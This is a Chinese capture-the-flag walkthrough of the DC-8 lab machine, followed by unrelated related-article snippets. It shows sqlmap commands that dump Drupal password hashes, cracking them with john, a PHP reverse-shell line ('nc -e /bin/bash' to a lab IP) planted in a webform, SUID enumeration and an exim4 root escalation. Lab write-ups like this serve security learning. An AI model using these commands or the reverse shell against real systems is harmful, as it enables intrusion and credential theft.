DC-8靶机渗透测试

news2024/11/11 2:45:17

DC-8靶机

文章目录

      • DC-8靶机
      • 信息收集
      • web渗透
      • 获取权限
      • 权限提升
      • 靶机总结

信息收集

1.nmap扫描出主机IP为192.168.78.156 开放80和22端口,没扫出来什么漏洞,但是发现robots.txt文件,给出了后台登录地址/usr/login
在这里插入图片描述

web渗透

1.登陆到主页发现是drupal框架,使用nmap也没扫出来什么,通过点击不同的页面,似乎发现了SQL注入的地方,点击下面的小标签返回了nid=2

image-20230627214823633

image-20230627214830891

2.使用手工测试一下是否存在注入点,输入’返回了mysql数据库的错误,发现有

image-20230627214941100

3.接下来测试是字符注入还是数字型注入,'#和 and 1=1,确定是数字型注入

image-20230627215027450

image-20230627215033967

4.使用SQLmap对注入点进行进行注入攻击测试`

python sqlmap.py -u http://192.168.78.156/?nid=2 -dbms mysql -batch -dbs

image-20230627223428566

5.进行继续获取表,数据,直到读取了账号和密码paylaod为

python sqlmap.py -u http://192.168.78.156/?nid=2 -dbms mysql -batch -D d7db -T users -C name,pass -dump
admin  $S$D2tRcYRyqVFNSc0NvYUrYeQbLQg5koMKtihYTIDC9QQqJi3ICg5z 
john   $S$DqupvJbxVmqjr6cYePnx2A891ln7lsuku/3if/oRVZJaz5mKC2vF

image-20230627223514533

6.很明显提示出了使用john进行密码破解,将密码保存到文件中,使用john破解hash得到相应的账密 john / turtle

image-20230627220058010

7.尝试进行ssh登录发现失败,去访问/usr/login页面,输入获得的账密登录到后台

获取权限

1.来到后台目录,尝试找到可以修改页面代码的功能,而且还能解析php的功能
2.根据尝试,找到提交反馈意见的界面,输入信息提交之后会显示提示语,而且该模块能自己编写提示语,还能写入php语言
3.在该界面,点击edit,找到WEBFORM处可以编辑并执行PHP代码

image-20230627223633134

4.直接在界面写入反弹shell的php代码

<?php
system("nc -e /bin/bash 192.168.78.145 7777");
?> 

image-20230627223742749

5.将提交重定向行Confirmation page(确认页面)给勾上,然后滑下点保存,继续来到contact界面,联系随便填入联系表单,点击发送,触发PHP代码

image-20230627223934562

6.来到kali主机上,查看监听的本地端口已经反弹回来了shell

image-20230627223856300

权限提升

1.进入到shell尝试很多方法,寻找home目录文件有无信息,sudo -l有没有提权,/etc/passwd和/etc/sudoers的权限,查看了密码文件查看用户只有dc8user
2.使用suid提前尝试一下

find / -user root -perm -4000 -print 2>/dev/null

image-20230627222912476

3.发现了老朋友exim4,前面就利用这个漏洞成功提过权,直接wget进行下载POC。一开始下载失败,发现是权限不够,应该是目录的问题,来到tmp文件下。

image-20230627223008979

4.一开始直接执行发现提权失败,使用./1.sh -m netcat命令发现才可以提权,使用id查看成功提权到了root

image-20230627223117448

5.进行读取flag文件,但是读取没一会发现权限就掉回去了,不太稳定捏

image-20230627223250935

靶机总结

  1. 本次靶机的关键点就在于web界面的SQL注入能否发现了
  2. 多尝试点击点击页面,查看url数据可能会发现SQL注入的注入点
  3. 测试注入点成功,可以直接使用sqlmap进行注入点攻击
  4. john 破解 hash密码
  5. drupal的网站后台来到contact的WEBFORM功能可以写入php代码进行反弹shell的操作
  6. 提权方式还是依旧的几种,本次的exim4提权,需要使用提权代码 ./1.sh -m netcat,增加了一个参数

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/1995325.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

Java有哪些数据类型?

Java有哪些数据类型 1. 基本数据类型 2. 引用数据类型 3. 总结 &#x1f388;边走、边悟&#x1f388;迟早会好 Java 中的数据类型分为两大类&#xff1a;基本数据类型&#xff08;primitive types&#xff09;和引用数据类型&#xff08;reference types&#xff09;。 …

代发考生战报:8月6号 西安 ,HCIE存储H13-629考试通过

代发考生战报&#xff1a;8月6号 西安 &#xff0c;HCIE存储H13-629考试通过&#xff0c;目前这个考试变题了&#xff0c;我找客服买的包过服务&#xff0c;有老师指导&#xff0c;考试通过了&#xff0c;里面的新题我看了&#xff0c;我是一点也不会&#xff0c;自己考的还是不…

Java代码混淆加密之Xjar

使用背景 代码安全性需求&#xff1a;在交付给客户或第三方时&#xff0c;保护源代码不被泄露或反编译是许多企业的核心需求。尤其是在竞争激烈的市场中&#xff0c;代码泄露可能导致严重的经济损失。 传统工具的局限性&#xff1a;虽然有很多混淆和加密工具&#xff0c;比如 …

【学习笔记】用线段树维护区间计数问题

前言 简单的区间计数问题可能直接推式子就行了。 但有些问题必须要数据结构维护。线段树就是一个比较好的处理区间的数据结构。 Gym102222L 思路 满足条件的区间特征&#xff1a; max ⁡ { a i } − min ⁡ { a i } 1 − c n t 0 \max\{a_i\}-\min\{a_i\}1-cnt0 max{ai​}…

uniapp离线打包热更新失败-AndroidStudio离线打包apk后无法下载打开-热更新失败-plus.runtime.install失败

效果图 仅安卓 前言 1.plus.runtime.install一直fail(20240808), uni.openDocument可以打开本地apk文件 2.权限问题需小心 跑通前提 1.先确定apk地址有效&#xff0c;浏览器中手动下载可安装 2.确保已添加离线打包AndroidStudio的“android.permission.INSTALL_PACKAGES”权…

初识自然语言处理NLP

文章目录 1、简介2、自然语言处理的发展简史3、语言学理论句法学&#xff08;Syntax&#xff09;语义学&#xff08;Semantics&#xff09;语用学&#xff08;Pragmatics&#xff09;形态学&#xff08;Morphology&#xff09; 4、统计与机器学习方法n-gram 模型隐马尔可夫模型…

JNPF快速开发平台赋能数字办公方式转变

随着信息技术的飞速发展&#xff0c;数字化转型已成为各行各业提升效率、优化流程的重要手段。JNPF快速开发平台正是在这样的背景下应运而生&#xff0c;它通过简化开发流程&#xff0c;使得非技术人员也能参与到应用的构建中来&#xff0c;从而加速了数字办公方式的转变。 数字…

解决r2dbc连mysql时timestamp字段的时区问题

现象&#xff1a; 在两个mysql库用相同SQL都建了某表&#xff0c;都有created_at字段&#xff1a; created_at timestamp NULL DEFAULT CURRENT_TIMESTAMP COMMENT 创建时间, 。但是在往此表insert记录时&#xff0c;B库的created_at字段比当前时间慢了8个小时&#xff0c;而A…

MySQL学习(19):锁

1.什么是锁 锁是计算机协调多个进程或线程并发访问某一资源的机制。 在数据库中&#xff0c;数据是供许多用户共享的资源&#xff0c;数据库必须保证数据并发访问的一致性、有效性&#xff0c;这就要靠锁来协调实现。 MySOL中的锁&#xff0c;分为以下三类&#xff1a; &am…

深度学习基础 - 向量投影

深度学习基础 - 向量投影 flyfish 给定两个向量 a \mathbf{a} a 和 b \mathbf{b} b&#xff0c;我们想要计算 a \mathbf{a} a 在 b \mathbf{b} b 上的投影。 点乘 (Dot Product) 点乘是一个标量&#xff0c;表示两个向量在相同方向上的程度。公式为&#xff1a; a ⋅ b …

行为验证码热门行业解决方案

行为式验证码是一种较为流行的验证码。从字面来理解&#xff0c;就是通过用户的操作行为来完成验证&#xff0c;而无需去读懂扭曲的图片文字&#xff0c;以下是常见的案例。 ​​热门行业解决方案 教育解决方案 教育资源不断线上化&#xff0c;使得违法违规内容风险不断提高&…

最近在西安召开的学术会议:EI检索超快,信息系统与计算技术领域!

第十二届信息系统与计算技术国际会议&#xff08;ISCTech 2024&#xff09;将于2024年11月8日-11月11日在中国西安盛大举行&#xff0c;由长沙理工大学主办&#xff0c;同济大学、西北工业大学联合协办。会议聚焦信息系统与计算技术等相关研究领域&#xff0c;广泛邀请国内外知…

货运物流App项目开发功能介绍

货运小程序通常具备多种功能&#xff0c;以便于用户管理和跟踪货物运输。以下是一些常见的功能介绍&#xff1a; 注册和登录&#xff1a; 用户可以通过手机号码或邮箱注册并登录账户。 货物发布&#xff1a; 用户可以创建货运订单&#xff0c;填写货物信息&#xff08;如品名、…

Proxmox vzdump backup ct vm

vzdump 参考 vzdump 备份参数参考 创建一键Proxmox vzdump 备份ct 虚拟机 vzdump 备份参数参考vmid 105 106 22-29行是环境变量,根据主机的实际情况更改ct 模板默认下载目录/var/lib/vz/template/cache所有备份默认目录/var/lib/vz/dumpiso 存放/var/lib/vz/template/iso# -*…

【扒代码】CCFF跨尺度特征融合

import torch import torch.nn as nn import torch.nn.functional as Fclass RepVggBlock(nn.Module):def __init__(self, ch_in, ch_out, actrelu):super().__init__()self.ch_in ch_in # 输入通道数self.ch_out ch_out # 输出通道数# 第一个卷积层&#xff0c;使用 3x3 卷…

iOS ------ UIKit相关

UIView和CALayer UIView UIView表示屏幕上的一块矩形区域&#xff0c;它是基本上iOS中所有可视化控件的父类。UIView可以管理矩形区域里的内容&#xff0c;处理矩形区域的事件&#xff0c;包括子视图的管理以及动画的实现。 UIKit相关类的继承关系 UIView继承自UIResponde…

封装加载(raect18+antd)

该组件主要是anted的组件中自带的loading属性&#xff0c; 1、封装loading组件 import React from react;function WithLoading(WrappedComponent: React.ComponentType<any>) {return (props: any) > {const [isLoading, setIsLoading] React.useState(true);Reac…

基于JAVA的高考智能排考场系统设计与实现,源码、部署+讲解

绪 论 随着教育规模的不断扩大和技术的进步&#xff0c;传统的考试管理方式面临着诸多挑战&#xff0c;如考试安排的复杂性、作弊现象的频发以及考试过程中的监督和管理等问题。因此&#xff0c;针对这些挑战&#xff0c;智能排考系统应运而生。 智能排考系统利用先进的技术…

接口基础知识5:详解request headers(一篇讲完常见字段)

课程大纲 一、请求头的定义 HTTP请求头部&#xff08;HTTP Request Headers&#xff09;&#xff1a;HTTP协议中的一部分&#xff0c;用于在客户端和服务器之间传递附加信息。这些头部字段提供了关于请求、客户端环境、或请求的上下文的信息。 请求头是键值对的形式&#xff…

day04-套餐管理

完成套餐管理模块所有业务功能&#xff0c;包括&#xff1a; 新增套餐套餐分页查询删除套餐修改套餐起售停售套餐 要求&#xff1a; 根据产品原型进行需求分析&#xff0c;分析出业务规则设计接口梳理表之间的关系&#xff08;分类表、菜品表、套餐表、口味表、套餐菜品关系…